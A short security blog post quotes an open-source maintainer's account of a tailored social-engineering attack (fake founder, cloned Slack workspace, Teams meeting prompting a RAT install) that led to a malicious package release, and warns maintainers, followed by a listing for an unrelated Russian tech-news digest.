so the attack vector mimics what google has documented here: https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
they tailored this process specifically to me by doing the following:
they reached out masquerading as the founder of a company they had cloned the companys founders likeness as well as the company itself.
they then invited me to a real slack workspace. this workspace was branded to the companies ci and named in a plausible manner. the slack was thought out very well, they had channels where they were sharing linked-in posts, the linked in posts i presume just went to the real companys account but it was super convincing etc. they even had what i presume were fake profiles of the team of the company but also number of other oss maintainers.
they scheduled a meeting with me to connect. the meeting was on ms teams. the meeting had what seemed to be a group of people that were involved.
the meeting said something on my system was out of date. i installed the missing item as i presumed it was something to do with teams, and this was the RAT.
everything was extremely well co-ordinated looked legit and was done in a professional manner.
A RAT is a Remote Access Trojan: this was the software that stole the developer's credentials, which could then be used to publish the malicious package.
That's a very effective scam. I join a lot of meetings where I find myself needing to install Webex or Microsoft Teams or similar at the last moment and the time constraint means I always click "yes" to things as quickly as possible to make sure I don't join late.
Every maintainer of open source software used by enough people to be worth taking in this way needs to be familiar with this attack strategy.
Tags: open-source , packaging , security , social-engineering , supply-chain
|
|
|
The Runet is being walled off, plus a law creating a registry of Russians' crypto wallets |
habr_ai |
06.04.2026 04:53 |
0.623
|
| Embedding sim. | 0.7463 |
| Entity overlap | 0.0645 |
| Title sim. | 0 |
| Time proximity | 0.7477 |
| NLP type | other |
| NLP organization | SpaceX |
| NLP topic | ai regulation |
| NLP country | Russia |
Open original
The most interesting finance and technology news in Russia and worldwide this week: a cap on foreign internet traffic in Russia, Russia's banking infrastructure broke down for a day, SpaceX's IPO is now targeting $2 trillion, OpenAI bought a podcast for psyops, and Claude Code's source code leaked.
Read more
|